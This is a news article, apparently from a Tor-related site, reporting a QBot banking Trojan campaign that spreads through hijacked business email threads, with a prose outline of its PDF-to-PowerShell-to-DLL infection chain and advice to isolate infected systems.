BTC $63442.8276
ETH $3469.7477
BNB $414.4838
SOL $128.8578
XRP $0.6333
ADA $0.7553
DOGE $0.1556
AVAX $42.2817
DOT $9.6926
wstETH $4022.3454
TRX $0.1396
LINK $20.2249
WETH $3455.5461
MATIC $1.0912
UNI $12.3248
WBTC $63402.0644
BCH $454.1971
LTC $89.7149
IMX $3.2697
ICP $13.1197
FIL $10.0810
CAKE $3.2889
ETC $33.3804
LEO $4.7626
ATOM $12.4298
RNDR $7.5236
TON $2.6714
KAS $0.1683
HBAR $0.1120
INJ $39.9268
DAI $0.9998
OKB $57.5556
VET $0.0485
STX $3.0863
FDUSD $0.9998
WEMIX $2.8006
XLM $0.1364
NEAR $4.5218
PEPE $0.0000
XMR $146.1340
LDO $3.3155
GRT $0.3143
ARB $1.9894
THETA $2.3291
TIA $15.9776
ENS $21.4774
CRO $0.1387
BTC $63442.8276
ETH $3469.7477
BNB $414.4838
SOL $128.8578
XRP $0.6333
ADA $0.7553
DOGE $0.1556
AVAX $42.2817
DOT $9.6926
wstETH $4022.3454
TRX $0.1396
LINK $20.2249
WETH $3455.5461
MATIC $1.0912
UNI $12.3248
WBTC $63402.0644
BCH $454.1971
LTC $89.7149
IMX $3.2697
ICP $13.1197
FIL $10.0810
CAKE $3.2889
ETC $33.3804
LEO $4.7626
ATOM $12.4298
RNDR $7.5236
TON $2.6714
KAS $0.1683
HBAR $0.1120
INJ $39.9268
DAI $0.9998
OKB $57.5556
VET $0.0485
STX $3.0863
FDUSD $0.9998
WEMIX $2.8006
XLM $0.1364
NEAR $4.5218
PEPE $0.0000
XMR $146.1340
LDO $3.3155
GRT $0.3143
ARB $1.9894
THETA $2.3291
TIA $15.9776
ENS $21.4774
CRO $0.1387
  • Catalog
  • Blog
  • Tor Relay
  • Jabber
  • One-Time notes
  • Temp Email
  • What is TOR?
  • We are in tor
  • New QBot Banking Trojan Operation Uses Compromised Business Emails as Entry Point

    Infection has already been detected in 10 countries, including Russia, the UK and the USA.

    According to the latest report from Kaspersky Lab, a new QBot malware campaign is using hacked business emails to trick unsuspecting victims into installing malware on their devices.

    The latest wave of malware activity, recorded on April 4 this year, was primarily targeted at users in Germany, Argentina, Italy, Algeria, Spain, the United States, Russia, France, Great Britain, and Morocco.

    QBot (aka Qakbot or Pinkslipbot) is a banking Trojan that has been active since at least 2007. In addition to stealing passwords and cookies from web browsers, the program acts as a backdoor to inject next-stage payloads such as Cobalt Strike or various ransomware.

    Spreading through phishing campaigns, the malware was constantly updated throughout its lifetime. The latest versions of the malware use anti-virtual machine, debugging, and sandboxing techniques to avoid detection and analysis by researchers.

    According to CheckPoint analysts, QBot software became the most prevalent malware in March of this year.

    “At first, QBot was distributed through infected websites and pirated software. Now the banker is delivered to potential victims using malware already on their computers, as well as social engineering and spam mailings, ”Kaspersky researchers said, explaining QBot distribution methods.

     

    Email hijacking attacks are far from new. This happens when cybercriminals tap into existing business conversations or initiate new conversations based on information previously collected through hacked email accounts. The purpose of such attacks is to induce victims to click on malicious links or download malicious attachments.

    In the latest QBot campaign, scammers used a PDF file that allegedly cannot be viewed due to the presence of protected files. To view it, the victim must click the "Open" button, which will download the ZIP archive from the attackers' website.

     

    The above archive contains an obfuscated Windows script file with the ".wsf" extension, the purpose of which is to subsequently execute the PowerShell script. And he, in turn, downloads a DLL library from a remote server of scammers, which is the QBot malware.

    Infection with such malware can lead to devastating attacks on corporate networks. Researchers at The DFIR Report showed last year that it takes QBot about half an hour after an initial infection to steal sensitive data. And what's even worse, in just an hour, the malware will already hit neighboring workstations.

    If your device is infected with QBot, it is extremely important to take the system offline as soon as possible and perform a full network assessment for unusual behavior.

    Author DeepWeb
    iPhone system calendar 'invites' users to install Israeli spyware
    UK intelligence: more than 80 countries around the world use spyware against citizens

    Comments 0

    Add comment